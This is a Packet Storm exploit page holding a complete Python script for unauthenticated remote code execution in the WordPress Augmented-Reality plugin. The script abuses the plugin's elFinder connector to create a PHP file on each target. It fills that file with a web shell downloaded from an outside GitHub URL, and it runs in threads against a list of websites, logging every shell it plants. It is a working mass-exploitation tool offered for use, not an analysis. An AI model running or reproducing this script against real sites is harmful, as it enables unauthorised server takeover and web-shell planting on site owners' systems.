exploit the possibilities
Home Files News &[SERVICES_TAB]About Contact Add New

WordPress Augmented-Reality Remote Code Execution

WordPress Augmented-Reality Remote Code Execution
Posted Feb 9, 2024
Authored by Milad Karimi

WordPress Augmented-Reality plugin suffers from a remote code execution vulnerability. It is unclear which versions are affected.

tags | exploit, remote, code execution
SHA-256 | c682681fe983347d98d6612c60ba471e9a15008367d394d8d6c0e2e6da56e3d3

WordPress Augmented-Reality Remote Code Execution

Change Mirror Download
# Exploit Title: Wordpress Augmented-Reality - Remote Code Execution Unauthenticated
# Date: 2023-09-20
# Author: Milad Karimi (Ex3ptionaL)
# Category : webapps
# Tested on: windows 10 , firefox

import requests as req
import json
import sys
import random
import uuid
import urllib.parse
import urllib3
from multiprocessing.dummy import Pool as ThreadPool
urllib3.disable_warnings(urllib3.exceptions.InsecureRequestWarning)
filename="{}.php".format(str(uuid.uuid4())[:8])
proxies = {}
#proxies = {
# 'http': 'http://127.0.0.1:8080',
# 'https': 'http://127.0.0.1:8080',
#}
phash = "l1_Lw"
r=req.Session()
user_agent={
"User-Agent":"Mozilla/5.0 (X11; Linux x86_64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/44.0.2403.157 Safari/537.36"
}
r.headers.update(user_agent)
def is_json(myjson):
try:
json_object = json.loads(myjson)
except ValueError as e:
return False
return True
def mkfile(target):
data={"cmd" : "mkfile", "target":phash, "name":filename}
resp=r.post(target, data=data)
respon = resp.text
if resp.status_code == 200 and is_json(respon):
resp_json=respon.replace(r"\/", "").replace("\\", "")
resp_json=json.loads(resp_json)
return resp_json["added"][0]["hash"]
else:
return False
def put(target, hash):
content=req.get("https://raw.githubusercontent.com/0x5a455553/MARIJUANA/master/MARIJUANA.php", proxies=proxies, verify=False)
content=content.text
data={"cmd" : "put", "target":hash, "content": content}
respon=r.post(target, data=data, proxies=proxies, verify=False)
if respon.status_code == 200:
return True
def exploit(target):
try:
vuln_path = "{}/wp-content/plugins/augmented-reality/vendor/elfinder/php/connector.minimal.php".format(target)
respon=r.get(vuln_path, proxies=proxies, verify=False).status_code
if respon != 200:
print("[FAIL] {}".format(target))
return
hash=mkfile(vuln_path)
if hash == False:
print("[FAIL] {}".format(target))
return
if put(vuln_path, hash):
shell_path = "{}/wp-content/plugins/augmented-reality/file_manager/{}".format(target,filename)
status = r.get(shell_path, proxies=proxies, verify=False).status_code
if status==200 :
with open("result.txt", "a") as newline:
newline.write("{}\n".format(shell_path))
newline.close()
print("[OK] {}".format(shell_path))
return
else:
print("[FAIL] {}".format(target))
return
else:
print("[FAIL] {}".format(target))
return
except req.exceptions.SSLError:
print("[FAIL] {}".format(target))
return
except req.exceptions.ConnectionError:
print("[FAIL] {}".format(target))
return
def main():
threads = input("[?] Threads > ")
list_file = input("[?] List websites file > ")
print("[!] all result saved in result.txt")
with open(list_file, "r") as file:
lines = [line.rstrip() for line in file]
th = ThreadPool(int(threads))
th.map(exploit, lines)
if __name__ == "__main__":
main()



Login or Register to add favorites

File Archive:

December 2024

  • Su
  • Mo
  • Tu
  • We
  • Th
  • Fr
  • Sa
  • 1
    Dec 1st
    0 Files
  • 2
    Dec 2nd
    41 Files
  • 3
    Dec 3rd
    25 Files
  • 4
    Dec 4th
    0 Files
  • 5
    Dec 5th
    0 Files
  • 6
    Dec 6th
    0 Files
  • 7
    Dec 7th
    0 Files
  • 8
    Dec 8th
    0 Files
  • 9
    Dec 9th
    0 Files
  • 10
    Dec 10th
    0 Files
  • 11
    Dec 11th
    0 Files
  • 12
    Dec 12th
    0 Files
  • 13
    Dec 13th
    0 Files
  • 14
    Dec 14th
    0 Files
  • 15
    Dec 15th
    0 Files
  • 16
    Dec 16th
    0 Files
  • 17
    Dec 17th
    0 Files
  • 18
    Dec 18th
    0 Files
  • 19
    Dec 19th
    0 Files
  • 20
    Dec 20th
    0 Files
  • 21
    Dec 21st
    0 Files
  • 22
    Dec 22nd
    0 Files
  • 23
    Dec 23rd
    0 Files
  • 24
    Dec 24th
    0 Files
  • 25
    Dec 25th
    0 Files
  • 26
    Dec 26th
    0 Files
  • 27
    Dec 27th
    0 Files
  • 28
    Dec 28th
    0 Files
  • 29
    Dec 29th
    0 Files
  • 30
    Dec 30th
    0 Files
  • 31
    Dec 31st
    0 Files

Top Authors In Last 30 Days

File Tags

Systems

packet storm

© 2024 Packet Storm. All rights reserved.

Services
Security Services
Hosting By
Rokasec
close